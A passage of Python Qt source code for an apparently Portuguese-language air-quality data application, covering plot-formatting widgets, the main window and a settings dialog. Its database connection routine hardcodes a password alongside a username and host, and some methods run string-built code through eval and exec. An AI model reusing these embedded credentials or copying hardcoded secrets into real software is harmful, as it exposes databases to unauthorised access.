self.unidade.activated.connect(self.changeHorizontalContents)\r\n\r\n def changeVerticalContents(self):\r\n size = self.size_y.value()\r\n min_ = self.min_y.value()\r\n max_ = self.max_y.value()\r\n fontsize = self.fontsize_y.value()\r\n this = {\"size\" : size, \"min_\": min_, \"max_\": max_, \"fontsize\":fontsize}\r\n self.parentWidget.canvas.smart_yticks(**this)\r\n self.updateProperties()\r\n return None\r\n\r\n def changeHorizontalContents(self):\r\n size = self.size_x.value()\r\n rotation = self.rotation_x.value()\r\n intervalo = self.intervalo.value()\r\n range_format = self.unidade.currentText()\r\n fontsize = self.fontsize_x.value()\r\n this = {\"size\": size, \"rotation\": rotation, \"fontsize\" : fontsize,\r\n \"daterange\": intervalo, \"dateformat\": range_format}\r\n self.parentWidget.canvas.smart_xticks(**this)\r\n self.updateProperties()\r\n return None\r\n\r\n def updateProperties(self):\r\n self.max_y.setValue(float(self.parentWidget.canvas.ytick_max))\r\n self.min_y.setValue(float(self.parentWidget.canvas.ytick_min))\r\n self.max_x.setValue(float(self.parentWidget.canvas.xtick_max))\r\n self.min_x.setValue(float(self.parentWidget.canvas.xtick_min))\r\n return None\r\n\r\n def run(self):\r\n items = self.items_timeseries\r\n if self.active_scatter: items = self.items_scatterplot\r\n TreeWidgetItems = []\r\n widgets = self.widgets[self.active_scatter]\r\n for key in widgets.keys():\r\n item = QTreeWidgetItem([key])\r\n TreeWidgetItems.append(item)\r\n\r\n self.insertTopLevelItems(0, TreeWidgetItems)\r\n j = 0\r\n for key, values in widgets.items():\r\n for i in range(len(values)):\r\n properties = items[key][i]\r\n child = QTreeWidgetItem()\r\n child.setText(0, properties)\r\n TreeWidgetItems[j].addChild(child)\r\n self.setItemWidget(child, 1, values[i])\r\n\r\n j += 1\r\n \r\n return None\r\n\r\n\r\nclass PropriedadesTab(QWidget):\r\n '''\r\n Classe responsável pela tab \"Gráfico\" e funcionamento da:\r\n - linha horizontal (limite);\r\n - Cor e label dos objetos na legenda da figura;\r\n - Propriedades da legenda da figura;\r\n - Tipo de gráfico\r\n - Propriedades dos títulos do gráfico, eixo X e eixo Y.\r\n '''\r\n\r\n def __init__(self, canvas = None):\r\n super().__init__()\r\n self.canvas = canvas\r\n\r\n # Widgets\r\n self.rotulos = [\"Título do gráfico\", \"Título (eixo horizontal)\",\r\n \"Título (eixo vertical)\"]\r\n self.ax_properties = [\".title\", \".xaxis.get_label()\",\r\n \".yaxis.get_label()\"]\r\n self.eixos = TabelaEixos(parentWidget = self)\r\n formatGroup = QGroupBox(\"Formatação\")\r\n self.bold = QPushButton(text = \"B\")\r\n self.elementos = QComboBox()\r\n self.textline = QLineEdit()\r\n self.fontsize = QSpinBox()\r\n #\r\n self.legend_colors = QTableWidget()\r\n legendGroup = QGroupBox(\"Legenda\")\r\n self.legend_cols = QSpinBox()\r\n self.legend_fontsize = QSpinBox()\r\n #\r\n LimiteGroup = QGroupBox(\"\")\r\n TipoGroup = QGroupBox(\"Tipo de gráfico\")\r\n self.grafico_tipo = QComboBox()\r\n self.check_limite = QCheckBox()\r\n self.value_limite = QSpinBox()\r\n \r\n # configurando widgets\r\n self.bold.setStyleSheet(\"font-weight: bold\")\r\n self.elementos.addItems(self.rotulos)\r\n self.fontsize.setRange(1, 50)\r\n self.bold.setCheckable(True)\r\n #\r\n self.legend_cols.setRange(1, 10)\r\n self.legend_cols.setValue(5)\r\n self.legend_fontsize.setRange(1, 30)\r\n self.legend_fontsize.setValue(10)\r\n #\r\n self.grafico_tipo.addItems([\"Gráfico de linha\", \"Gráfico de barra\", \r\n \"Gráfico de ultrapassagens\"])\r\n self.value_limite.setMaximum(10000)\r\n\r\n # Layouts\r\n SubLayout = QVBoxLayout()\r\n SubLayout.addWidget(QLabel(\"Elementos dos eixos\"))\r\n SubLayout.addWidget(self.eixos)\r\n #\r\n FormatLayout2 = QGridLayout()\r\n FormatLayout2.addWidget(self.elementos, 0, 0, 1, 3)\r\n FormatLayout2.addWidget(self.textline, 1, 0)\r\n FormatLayout2.addWidget(self.fontsize, 1, 1)\r\n FormatLayout2.addWidget(self.bold, 1, 2)\r\n formatGroup.setLayout(FormatLayout2)\r\n #\r\n LimiteLayout = QHBoxLayout()\r\n LimiteLayout.addWidget(QLabel(\"Incluir limite\"))\r\n LimiteLayout.addWidget(self.check_limite)\r\n LimiteLayout.addWidget(QLabel(\"Valor\"))\r\n LimiteLayout.addWidget(self.value_limite)\r\n LimiteLayout.setStretch(3, 10)\r\n LimiteGroup.setLayout(LimiteLayout)\r\n grafico_tipo_Layout = QHBoxLayout()\r\n grafico_tipo_Layout.addWidget(self.grafico_tipo)\r\n TipoGroup.setLayout(grafico_tipo_Layout)\r\n FormatLayout = QVBoxLayout()\r\n FormatLayout.addWidget(LimiteGroup)\r\n FormatLayout.addWidget(formatGroup) \r\n FormatLayout.addWidget(TipoGroup)\r\n #\r\n positionLayout = QHBoxLayout()\r\n positionLayout.addWidget(QLabel(\"Colunas\"))\r\n positionLayout.addWidget(self.legend_cols)\r\n positionLayout.addWidget(QLabel(\"Tamanho\"))\r\n positionLayout.addWidget(self.legend_fontsize)\r\n positionLayout.setStretch(1, 2)\r\n displayLayout = QVBoxLayout()\r\n displayLayout.addLayout(positionLayout)\r\n displayLayout.addWidget(self.legend_colors)\r\n legendGroup.setLayout(displayLayout)\r\n #\r\n MainLayout = QHBoxLayout()\r\n MainLayout.addLayout(FormatLayout)\r\n MainLayout.addLayout(SubLayout)\r\n MainLayout.addWidget(legendGroup)\r\n self.setLayout(MainLayout)\r\n\r\n # Signals and Slots\r\n self.legend_colors.cellDoubleClicked.connect(self.choose_color)\r\n self.legend_colors.cellChanged.connect(self.change_label)\r\n self.legend_cols.valueChanged.connect(self.updateLegendFormat)\r\n self.legend_fontsize.valueChanged.connect(self.updateLegendFormat)\r\n self.elementos.activated.connect(self.format_options)\r\n self.textline.editingFinished.connect(self.set_label)\r\n self.fontsize.valueChanged.connect(self.set_fontsize)\r\n self.bold.clicked.connect(self.set_bold)\r\n\r\n # chamando funcoes\r\n self.format_options()\r\n\r\n def updateLegendFormat(self):\r\n ncols = self.legend_cols.value()\r\n size = self.legend_fontsize.value()\r\n self.canvas.updateLegend(ncols, size)\r\n return None\r\n\r\n def change_label(self, row, column):\r\n if column != 0:\r\n return None\r\n \r\n new_label = self.legend_colors.item(row, column).text()\r\n item_id = self.legend_colors.item(row, 2).text()\r\n \r\n ncols = self.legend_cols.value()\r\n size = self.legend_fontsize.value()\r\n self.canvas.alias[item_id] = new_label\r\n self.canvas.updateLegend(ncols, size)\r\n\r\n return None\r\n \r\n def choose_color(self, row, column):\r\n if column != 1:\r\n return None\r\n \r\n item = self.legend_colors.item(row, column)\r\n Color = item.background().color()\r\n id_ = self.legend_colors.item(row, 2).text()\r\n color_picker = QColorDialog().getColor(Color, title = \"Gerenciador de cores\")\r\n if color_picker.isValid():\r\n rgba = color_picker.getRgb()\r\n item.setBackground(QColor.fromRgb(*rgba))\r\n self.canvas.updateColor(id_, tuple(i/255 for i in rgba))\r\n \r\n ncols = self.legend_cols.value()\r\n size = self.legend_fontsize.value()\r\n self.canvas.updateLegend(ncols, size)\r\n return None\r\n\r\n def set_label(self):\r\n ax_properties = [\".label\", \".xlabel\", \".ylabel\"]\r\n text = eval(\"self.canvas.axes{}\".format(self.ax_properties[self.elementos.currentIndex()]))\r\n novo_texto = self.textline.text()\r\n text.set_text(novo_texto)\r\n exec(\"self.canvas{} = novo_texto\".format(ax_properties[self.elementos.currentIndex()]))\r\n self.canvas.draw()\r\n return None\r\n\r\n def set_fontsize(self):\r\n ax_properties = [\".label\", \".xlabel\", \".ylabel\"]\r\n text = eval(\"self.canvas.axes{}\".format(self.ax_properties[self.elementos.currentIndex()]))\r\n text.set_fontsize(self.fontsize.value())\r\n exec(\"self.canvas{}_fontsize = {}\".format(ax_properties[self.elementos.currentIndex()], self.fontsize.value()))\r\n self.canvas.draw()\r\n return None\r\n\r\n def set_bold(self):\r\n ax_properties = [\".label\", \".xlabel\", \".ylabel\"]\r\n text = eval(\"self.canvas.axes{}\".format(self.ax_properties[self.elementos.currentIndex()]))\r\n fontweight = [\"normal\", \"bold\"]\r\n boolean = self.bold.isChecked()\r\n text.set_fontweight(fontweight[boolean])\r\n exec(\"self.canvas{}_fontweight = fontweight[boolean]\".format(ax_properties[self.elementos.currentIndex()]))\r\n self.canvas.draw()\r\n return None\r\n\r\n def format_options(self):\r\n ax_properties = [\".label\", \".xlabel\", \".ylabel\"]\r\n idx = ax_properties[self.elementos.currentIndex()]\r\n self.textline.setText(\r\n eval(\"self.canvas{}{}\".format(idx, \"\")))\r\n self.fontsize.setValue(\r\n eval(\"int(self.canvas{}{})\".format(idx, \"_fontsize\")))\r\n self.bold.setChecked(\r\n eval(\"self.canvas{}{}\".format(idx, \"_fontweight\"))== \"bold\")\r\n return None\r\n\r\n def stretchHeader(self):\r\n Header = self.legend_colors.horizontalHeader()\r\n Header.setSectionResizeMode(QHeaderView.Stretch)\r\n Header.resizeSections()\r\n return None\r\n\r\n def update_table(self):\r\n colors = self.canvas.colors\r\n alias = self.canvas.alias\r\n h, labels = self.canvas.axes.get_legend_handles_labels()\r\n self.legend_colors.setRowCount(len(labels))\r\n self.legend_colors.setColumnCount(3)\r\n self.legend_colors.setHorizontalHeaderLabels([\"Nome\",\r\n \"Cor da Legenda\", \"ID\"])\r\n self.legend_colors.setColumnHidden(2, True)\r\n\r\n i = 0\r\n for id_ in labels:\r\n item_name = QTableWidgetItem(alias[id_])\r\n item_color = QTableWidgetItem()\r\n item_id = QTableWidgetItem(id_)\r\n temp = (np.array(colors[id_])*255).astype(int)\r\n item_color.setBackground(QColor.fromRgb(*temp))\r\n #\r\n item_name.setFlags(item_name.flags())\r\n item_color.setFlags(item_color.flags() & ~Qt.ItemIsEditable)\r\n #\r\n self.legend_colors.setItem(i, 2, item_id)\r\n self.legend_colors.setItem(i, 1, item_color)\r\n self.legend_colors.setItem(i, 0, item_name)\r\n i += 1\r\n\r\n self.stretchHeader()\r\n return None\r\n\r\n\r\nclass MainWindow(QMainWindow):\r\n '''\r\n Janela principal do programa\r\n '''\r\n\r\n def __init__(self):\r\n super().__init__()\r\n # splash = SplashScreen()\r\n self.version = 1.1\r\n\r\n # Propriedades da janela\r\n self.setWindowTitle(\"ArES\")\r\n self.resize(1000, 700) # largura, altura\r\n self.logo_icon = QIcon()\r\n self.logo_icon.addFile(\".\\\\icons\\\\logo.ico\")\r\n self.setWindowIcon(self.logo_icon)\r\n\r\n # variaveis criadas para o gerenciamento da janela\r\n self.save_dir = os.path.expanduser(mpl.rcParams['savefig.directory'])\r\n self.ds = None\r\n self.results = {}\r\n self.signature = []\r\n self.arquivos = []\r\n self.inventory = data_management.Inventario(parent = self)\r\n self.configs = self.first_launch()\r\n self.lista_calculo = [\"Nenhum\", \"Média móvel\", \"Média aritmética\",\r\n \"Média geométrica\", \"Média harmônica\"]\r\n\r\n # Widget Principal\r\n widget = QWidget(self)\r\n self.setCentralWidget(widget)\r\n\r\n # Outros Widgets\r\n self.dataset_dialog = DatasetDialog(self)\r\n self.botao_abrir = QPushButton(\"Adicionar\")\r\n self.botao_remover = QPushButton(\"Remover\")\r\n self.botao_limpar = QPushButton(\"Limpar\")\r\n self.botao_configs = QPushButton(\"Configurações\")\r\n self.botao_processar = QPushButton(\"Processar\")\r\n self.tabela = Tabela(self)\r\n self.data_ini = QDateEdit(QDate.currentDate().addMonths(-1))\r\n self.data_fim = QDateEdit(QDate.currentDate())\r\n self.user_operations = OperationsTable(self)\r\n save_icon = QIcon.fromTheme(\"document-save\",\r\n QIcon(\".\\\\icons\\\\icon_save.ico\"))\r\n saveAct = QAction(save_icon, \"Salvar como tabela...\", self)\r\n saveAct.triggered.connect(self.exportar_excel)\r\n\r\n # Canvas Matplotlib\r\n self.canvas = graphictools.MplCanvas(self)\r\n self.toolbar = graphictools.NavigationToolbar(self.canvas, self)\r\n self.toolbar.addAction(saveAct)\r\n \r\n # Tab Dados\r\n DadosLayout = QHBoxLayout()\r\n TabelaLayout = QVBoxLayout()\r\n ButtonTabelaLayout = QHBoxLayout()\r\n #\r\n ButtonTabelaLayout.addWidget(self.botao_abrir)\r\n ButtonTabelaLayout.addWidget(self.botao_remover)\r\n ButtonTabelaLayout.addWidget(self.botao_limpar)\r\n #\r\n TabelaLayout.addLayout(ButtonTabelaLayout)\r\n TabelaLayout.addWidget(self.tabela)\r\n #\r\n DataLayout = QHBoxLayout()\r\n DataLayout.addWidget(QLabel(\"Período: \"))\r\n DataLayout.addWidget(self.data_ini)\r\n DataLayout.addWidget(QLabel(\" a \"))\r\n DataLayout.addWidget(self.data_fim)\r\n DataLayout.addStretch(5)\r\n DataLayout.addWidget(self.botao_configs)\r\n DataLayout.addWidget(self.botao_processar)\r\n #\r\n ParametrosLayout = QGridLayout()\r\n ParametrosLayout.addLayout(DataLayout, 0, 1)\r\n ParametrosLayout.setColumnStretch(1, 10)\r\n ParametrosLayout.addWidget(self.user_operations, 2, 1)\r\n #\r\n DadosLayout.addLayout(TabelaLayout)\r\n DadosLayout.addLayout(ParametrosLayout)\r\n #\r\n self.DadosTab = QWidget()\r\n self.DadosTab.setLayout(DadosLayout)\r\n\r\n # Tab Widget\r\n self.tab = QTabWidget()\r\n self.GraficoTab = PropriedadesTab(self.canvas)\r\n self.tab.addTab(self.DadosTab, \"Dados\")\r\n self.tab.addTab(self.GraficoTab, \"Gráfico\")\r\n \r\n # Layout principal (central) do programa\r\n MainLayout = QGridLayout()\r\n MainLayout.addWidget(self.tab, 2, 0)\r\n MainLayout.addWidget(self.canvas, 1, 0)\r\n MainLayout.addWidget(self.toolbar, 0, 0)\r\n MainLayout.setRowStretch(1, 4)\r\n MainLayout.setRowStretch(2, 1)\r\n widget.setLayout(MainLayout) # Coloca o Layout principal na Janela (Importante)\r\n\r\n # Signals and Slots\r\n self.botao_abrir.clicked.connect(self.openDatasetWindow)\r\n self.botao_remover.clicked.connect(self.remover_arquivo)\r\n self.botao_limpar.clicked.connect(self.clean_files)\r\n self.botao_processar.clicked.connect(self.processar)\r\n self.GraficoTab.check_limite.stateChanged.connect(self.updateGraph)\r\n self.GraficoTab.value_limite.editingFinished.connect(self.updateGraph)\r\n self.GraficoTab.grafico_tipo.currentTextChanged.connect(self.updateGraph)\r\n self.botao_configs.clicked.connect(self.openConfigWindow)\r\n # splash.close()\r\n\r\n def first_launch(self):\r\n userhome_directory = os.path.expanduser(\"~\")\r\n ArES_dir = os.path.join(userhome_directory, '.ArES')\r\n\r\n # Criando JSON com as configuracoes iniciais\r\n data = {}\r\n data['conexao'] = dict(\r\n host = \"PC-INV109399\",\r\n username = 'lucassm',\r\n database = \"banco_gear\"\r\n )\r\n data['representatividade'] = {\r\n \"Diária\": 75,\r\n \"Mensal\": 75,\r\n \"Anual\": 50,\r\n \"No período\": 0,\r\n \"Média móvel\": 75,\r\n \"Geral\" : 75\r\n }\r\n data['criterios_dados'] = [True, False, False]\r\n data['converter'] = {\r\n 'ppb2ppm' : False\r\n }\r\n data['semiautomatica'] = {\r\n 'data_referencia' : '2017-01-06',\r\n 'frequencia_dias' : 6\r\n }\r\n data['version'] = self.version\r\n\r\n fname = os.path.join(ArES_dir, 'launch_config.json')\r\n\r\n # Manipulacoes\r\n try:\r\n # Se o diretorio nao existir, cria ele\r\n os.makedirs(ArES_dir, exist_ok=True)\r\n\r\n # se o arquivo JSON com as configuracoes existir, provcoa um erro\r\n exists = os.path.isfile(fname)\r\n if not exists:\r\n with open(fname, 'w', encoding='utf-8') as f:\r\n json.dump(data, f, ensure_ascii=False, indent=4)\r\n\r\n else:\r\n raise FileExistsError\r\n\r\n except FileExistsError:\r\n # se o diretorio e o arquivo existirem, importa ele no programa\r\n with open(fname, 'r', encoding='utf-8') as f:\r\n existing_data = json.load(f)\r\n \r\n for k, v in existing_data.items():\r\n data[k] = v\r\n \r\n data['version'] = self.version\r\n\r\n return data\r\n \r\n def save_configs(self):\r\n data = self.configs\r\n userhome_directory = os.path.expanduser(\"~\")\r\n ArES_dir = os.path.join(userhome_directory, '.ArES')\r\n fname = os.path.join(ArES_dir, 'launch_config.json')\r\n with open(fname, 'w', encoding='utf-8') as f:\r\n json.dump(data, f, ensure_ascii=False, indent=4)\r\n \r\n return None\r\n \r\n def openConfigWindow(self):\r\n\r\n dialog = MyDialog(self)\r\n dialog.show()\r\n dialog.exec()\r\n\r\n def openDatasetWindow(self):\r\n if not self.dataset_dialog.isVisible():\r\n self.dataset_dialog.show()\r\n self.dataset_dialog.exec()\r\n\r\n else:\r\n self.dataset_dialog.setWindowState(Qt.WindowNoState)\r\n return None\r\n\r\n def processar(self):\r\n ini = self.data_ini.date().toPython()\r\n fim = self.data_fim.date().toPython()\r\n\r\n # checa por inconsistencias\r\n n = len(self.arquivos)\r\n \r\n # Testes de verificacao\r\n # se nenhum arquivo foi aberto, notifique o usuario\r\n if n == 0:\r\n x = QMessageBox(QMessageBox.Warning, \"Erro\",\r\n 'Não é possível realizar o processamento', parent = self)\r\n x.addButton(QMessageBox.Ok)\r\n x.setInformativeText(\"Por favor, adicione pelo menos um conjunto de dados.\")\r\n x.exec()\r\n return None\r\n\r\n # se a data inicial for maior que a final\r\n elif ini > fim:\r\n x = QMessageBox(QMessageBox.Warning, \"Erro\",\r\n 'Não é possível realizer o processamento', parent = self)\r\n x.addButton(QMessageBox.Ok)\r\n x.setInformativeText(\"A data final especificada é menor do que a data inicial.\")\r\n x.exec()\r\n return None\r\n \r\n # ao passar os testes\r\n station_types = [0]*n\r\n for i in range(n):\r\n station_types[i] = self.arquivos[i].tipo\r\n unique_type = np.unique(station_types)\r\n\r\n # se estacoes de tipos diferentes forem adicionadas\r\n if unique_type.shape[0] > 1:\r\n x = QMessageBox(QMessageBox.Warning, \"Erro\",\r\n 'Não é possível realizar o processamento com tipos de estações diferentes.',\r\n parent = self\r\n )\r\n x.addButton(QMessageBox.Ok)\r\n x.setInformativeText(\r\n \"Por favor, mantenha aberto no programa somente estações de monitoramento do mesmo tipo.\"\r\n )\r\n x.exec()\r\n return None\r\n\r\n # Operacoes\r\n\r\n # debug\r\n self.ds = utilitarios.organize(self, ini, fim, unique_type[0])\r\n # try:\r\n # # provoca um erro se nenhum paramtro for selecionado\r\n # self.ds = utilitarios.organize(self, ini, fim, unique_type[0])\r\n # except:\r\n # x = QMessageBox(QMessageBox.Warning, \"Erro\",\r\n # 'Não é possível realizar o processamento', parent = self)\r\n # x.addButton(QMessageBox.Ok)\r\n # x.setInformativeText(\"Por favor, selecione pelo menos um parâmetro.\")\r\n # x.exec()\r\n # return None\r\n\r\n utilitarios.rotina_operacoes(self, unique_type[0])\r\n gc.collect() # Chama o coletor de lixo, para liberar espaço\r\n\r\n # prepara os resultados, segundo a representatividade, e checa se os\r\n # as series de dados resultantes nao estao vazias\r\n lim = self.get_lim()\r\n self.results = self.ds.mask_invalidos(lim)\r\n if self.ds.is_empty(self.results):\r\n x = QMessageBox(QMessageBox.Critical, \"Erro\", \"Dados inválidos\", parent = self)\r\n x.addButton(QMessageBox.Ok)\r\n x.setInformativeText('A série de dados se encontra vazia '\r\n 'ou composta somente por dados inválidos.')\r\n x.exec()\r\n return None\r\n\r\n # finalmente plota, se nao houver problemas\r\n self.updateGraph()\r\n\r\n def clean_files(self):\r\n self.arquivos = []\r\n self.signature = []\r\n self.ds.clear()\r\n \r\n # Libera memoria de objetos nao referenciados\r\n gc.collect()\r\n self.tabela.update()\r\n \r\n def get_lim(self):\r\n groupby = self.ds.agrupar\r\n if len(groupby) == 0:\r\n ultima_operacao = \"Geral\"\r\n \r\n else:\r\n time_freq = [\"Diária\", \"Mensal\", \"Anual\"]\r\n known_freq = [\"Dia\", \"Mês\", \"Ano\"]\r\n freq_dict = dict(zip(known_freq, time_freq))\r\n \r\n ultima_operacao = groupby[-1].split(\" \")[0]\r\n ultima_operacao = freq_dict.get(ultima_operacao, \"Geral\")\r\n\r\n lim = self.configs['representatividade'][ultima_operacao]\r\n return lim\r\n\r\n def updateGraph(self):\r\n # Limpar o plot atual\r\n self.canvas.reset()\r\n\r\n if self.ds != None:\r\n graphTypes = [\r\n self.canvas.linePlot,\r\n self.canvas.barPlot,\r\n self.canvas.ultrapassagensPlot\r\n ]\r\n graphTypes[self.GraficoTab.grafico_tipo.currentIndex()](\r\n self.ds, self.results\r\n )\r\n\r\n if self.GraficoTab.check_limite.isChecked():\r\n value = self.GraficoTab.value_limite.value()\r\n self.canvas.hline_faixa(value)\r\n\r\n ncols = self.GraficoTab.legend_cols.value()\r\n size = self.GraficoTab.legend_fontsize.value()\r\n self.canvas.updateLegend(ncols, size)\r\n self.GraficoTab.eixos.updateProperties()\r\n self.GraficoTab.update_table()\r\n\r\n return True\r\n \r\n def remover_arquivo(self):\r\n ''' comando para remover as estacoes ja abertas no programa\r\n conforme selecionadas na tabela.'''\r\n # Esse metodo varre toda a tabela em busca do selecionado.\r\n for i in range(len(self.arquivos)):\r\n TopLevelItem = self.tabela.items[i]\r\n if TopLevelItem.isSelected():\r\n entity_idx = TopLevelItem.child(0).data(1, 0)\r\n del self.signature[entity_idx] # quem é ? nao lembro para que serve\r\n del self.arquivos[entity_idx]\r\n\r\n # Libera memoria de objetos nao referenciados\r\n gc.collect()\r\n\r\n # atualiza a tabela\r\n self.tabela.update()\r\n\r\n def exportar_excel(self):\r\n startpath = self.save_dir\r\n start = os.path.join(startpath)\r\n fname, filter = QFileDialog.getSaveFileName(\r\n parent = self,\r\n caption = \"Salvar tabela como...\",\r\n dir = start,\r\n filter = \"Excel files (*.xlsx)\",\r\n )\r\n if len(fname) > 0 and self.ds.shape[0] > 0:\r\n self.save_dir = os.path.dirname(fname)\r\n try:\r\n utilitarios.save_excel(self.ds, fname)\r\n\r\n except xlsxwriter.exceptions.FileCreateError as e:\r\n x = QMessageBox(QMessageBox.Critical, \"Erro\", \"Erro ao salvar\", parent = self)\r\n x.addButton(QMessageBox.Ok)\r\n x.setInformativeText('Não foi possível salvar a planilha de dados. '\r\n '\\nVerifique se ela esta aberta em outro programa.')\r\n x.exec()\r\n return None\r\n\r\n def closeEvent(self, event) -> None:\r\n if not self.dataset_dialog.isHidden():\r\n self.dataset_dialog.close()\r\n\r\n self.inventory.disconnect()\r\n return super().closeEvent(event)\r\n\r\n\r\nclass MyDialog(QDialog):\r\n '''\r\n Diálogo de Configurações\r\n '''\r\n\r\n def __init__(self, master):\r\n QDialog.__init__(self)\r\n self.master = master\r\n self.setWindowTitle(\"Configurações\")\r\n self.setFixedSize(500, 300)\r\n self.setModal(True)\r\n self.setWindowIcon(master.logo_icon)\r\n\r\n # Widgets\r\n #\r\n self.save_button = QPushButton(\"Salvar\")\r\n self.apply_button = QPushButton(\"Aplicar\")\r\n #\r\n self.WidgetRepresentatividade = QTableWidget()\r\n self.valueRepresentatividade = {}\r\n group = QGroupBox(\"Conexão do banco de dados\", parent = self)\r\n self.connect_button = QPushButton(\"Conectar\")\r\n self.hostname = QLineEdit(self.master.configs['conexao']['host'])\r\n self.Tabs = TabWidget()\r\n #\r\n data_group = QGroupBox(parent = self)\r\n self.criterios_button = [QCheckBox(x) for x in ['Válidos', 'Inválidos', \"Suspeitos\"]]\r\n for x in range(len(self.master.configs['criterios_dados'])):\r\n self.criterios_button[x].setChecked(self.master.configs['criterios_dados'][x])\r\n self.convert_ppm = QCheckBox(\"Converter unidade [ppb] para [ppm]\")\r\n self.convert_ppm.setChecked(self.master.configs['converter']['ppb2ppm'])\r\n #\r\n data = [int(x) for x in self.master.configs['semiautomatica']['data_referencia'].split('-')]\r\n self.semiautomatica = {\r\n 'reference_date' : QDateEdit(QDate(data[0], data[1], data[2])),\r\n \"frequency_days\" : QSpinBox()\r\n }\r\n self.semiautomatica['frequency_days'].setValue(self.master.configs['semiautomatica']['frequencia_dias'])\r\n\r\n # Configuracoes dos Widgets\r\n Header = self.WidgetRepresentatividade.horizontalHeader()\r\n Header.setSectionResizeMode(QHeaderView.Stretch)\r\n Header.resizeSections()\r\n self.WidgetRepresentatividade.setColumnCount(2)\r\n self.WidgetRepresentatividade.setHorizontalHeaderLabels([\"Representatividade\", \"Valor (%)\"])\r\n for k, v in master.configs['representatividade'].items():\r\n self.valueRepresentatividade[k] = QSpinBox()\r\n self.valueRepresentatividade[k].setRange(0, 100)\r\n self.valueRepresentatividade[k].setValue(v)\r\n self.WidgetRepresentatividade.setRowCount(len(self.valueRepresentatividade))\r\n self.runWidget()\r\n\r\n # Layouts\r\n LoginLayout = QGridLayout()\r\n LoginLayout.addWidget(QLabel(text = \"Host\"), 0, 0)\r\n LoginLayout.addWidget(self.hostname, 0, 1, 1, 2)\r\n LoginLayout.addWidget(self.connect_button, 3, 2)\r\n LoginLayout.setRowStretch(4, 5)\r\n group.setLayout(LoginLayout)\r\n #\r\n criterios_layout = QVBoxLayout()\r\n criterios_layout.addWidget(QLabel(\"Somente considerar dados:\"))\r\n for x in self.criterios_button:\r\n criterios_layout.addWidget(x)\r\n\r\n criterios_layout.addWidget(QHLine())\r\n criterios_layout.addWidget(self.convert_ppm)\r\n criterios_layout.addWidget(QHLine())\r\n criterios_layout.addWidget(QLabel(\"Estações Semiautomáticas ->\"))\r\n qhbox1 = QHBoxLayout()\r\n qhbox1.addWidget(QLabel(\"Frequência de amostragem: \"))\r\n qhbox1.addWidget(self.semiautomatica['frequency_days'])\r\n qhbox1.addWidget(QLabel(\" Dias\"))\r\n qhbox1.addStretch(5)\r\n criterios_layout.addLayout(qhbox1)\r\n qhbox2 = QHBoxLayout()\r\n qhbox2.addWidget(QLabel(\"Data de referência: \"))\r\n qhbox2.addWidget(self.semiautomatica['reference_date'])\r\n qhbox2.addStretch(5)\r\n criterios_layout.addLayout(qhbox2)\r\n criterios_layout.addStretch(5)\r\n data_group.setLayout(criterios_layout)\r\n #\r\n self.Tabs.addTab(self.WidgetRepresentatividade, \"Representatividade\")\r\n self.Tabs.addTab(group, \"Conexão\")\r\n self.Tabs.addTab(data_group, \"Dados\")\r\n \r\n # Widgets para troca\r\n self.MainLayout = QVBoxLayout()\r\n buttonLayout = QHBoxLayout()\r\n self.MainLayout.addWidget(self.Tabs)\r\n buttonLayout.addStretch(10)\r\n buttonLayout.addWidget(self.save_button)\r\n buttonLayout.addWidget(self.apply_button)\r\n self.MainLayout.addLayout(buttonLayout)\r\n\r\n # Signals and Slots\r\n self.connect_button.clicked.connect(self.connect_sql)\r\n self.save_button.clicked.connect(self.save_json)\r\n self.apply_button.clicked.connect(lambda x: self.apply_changes(True))\r\n\r\n # init\r\n self.setLayout(self.MainLayout)\r\n\r\n def connect_sql(self):\r\n # username = self.username_widget.text()\r\n # password = self.password_widget.text()\r\n username = self.master.configs['conexao']['username']\r\n password = \"174784\"\r\n host = self.hostname.text()\r\n code = self.master.inventory.connect(username, password, host)\r\n if code != 1:\r\n if code == 1045:\r\n message = \"Acesso negado.\"\r\n informative_text = \"Login ou senha estão errados.\"\r\n elif code == 2005:\r\n message = \"Erro de conexão.\"\r\n informative_text = \"O host não existe ou se encontra offline.\"\r\n x = QMessageBox(QMessageBox.Warning, \"Erro\",\r\n message, parent = self)\r\n x.addButton(QMessageBox.Ok)\r\n x.setInformativeText(informative_text)\r\n x.exec()\r\n else:\r\n message = \"Conetado.\"\r\n informative_text = \"A conexão com o servidor foi estabelecida.\"\r\n x = QMessageBox(parent = self)\r\n x.setText(message)\r\n x.addButton(QMessageBox.Ok)\r\n x.setInformativeText(informative_text)\r\n x.exec()\r\n \r\n self.master.dataset_dialog.search_empresas()\r\n\r\n return None\r\n\r\n def runWidget(self):\r\n i = 0\r\n for k, v in self.valueRepresentatividade.items():\r\n self.WidgetRepresentatividade.setCellWidget(i, 1, v)\r\n item = QTableWidgetItem(k)\r\n item.setFlags(item.flags() & ~Qt.ItemIsEditable)\r\n self.WidgetRepresentatividade.setItem(i, 0, item)\r\n i += 1\r\n\r\n def closeEvent(self, event) -> None:\r\n return super().closeEvent(event)\r\n\r\n def apply_changes(self, close = True):\r\n ''' Aplica as modificacoes e fecha a janela'''\r\n for k, v in self.valueRepresentatividade.items():\r\n self.master.configs['representatividade'][k] = v.value()\r\n\r\n for i in range(len(self.criterios_button)):\r\n status = self.criterios_button[i].isChecked()\r\n self.master.configs['criterios_dados'][i] = status\r\n\r\n self.master.configs['converter']['ppb2ppm'] = self.convert_ppm.isChecked()\r\n \r\n format = Qt.DateFormat.ISODateWithMs\r\n date = self.semiautomatica[\"reference_date\"].date().toString(format)\r\n value = self.semiautomatica[\"frequency_days\"].value()\r\n self.master.configs['semiautomatica']['data_referencia'] = date\r\n self.master.configs['semiautomatica']['frequencia_dias'] = value\r\n\r\n if close:\r\n return self.close()\r\n\r\n def save_json(self):\r\n ''' Salva e aplica as configuracoes, mas nao fecha'''\r\n\r\n self.apply_changes(close = False)\r\n self.master.save_configs()\r\n\r\n return None\r\n\r\nclass TabBar(QTabBar):\r\n def tabSizeHint(self, index):\r\n s = QTabBar.tabSizeHint(self, index)\r\n s.transpose()\r\n return s\r\n\r\n def paintEvent(self, event):\r\n painter = QStylePainter(self)\r\n opt = QStyleOptionTab()\r\n\r\n for i in range(self.count()):\r\n self.initStyleOption(opt, i)\r\n painter.drawControl(QStyle.CE_TabBarTabShape, opt)\r\n painter.save()\r\n\r\n s = opt.rect.size()\r\n s.transpose()\r\n r = QRect(QPoint(), s)\r\n r.moveCenter(opt.rect.center())\r\n opt.rect = r\r\n\r\n c = self.tabRect(i).center()\r\n painter.translate(c)\r\n painter.rotate(90)\r\n painter.translate(-c)\r\n painter.drawControl(QStyle.CE_TabBarTabLabel, opt);\r\n painter.restore()\r\n\r\n\r\nclass TabWidget(QTabWidget):\r\n def 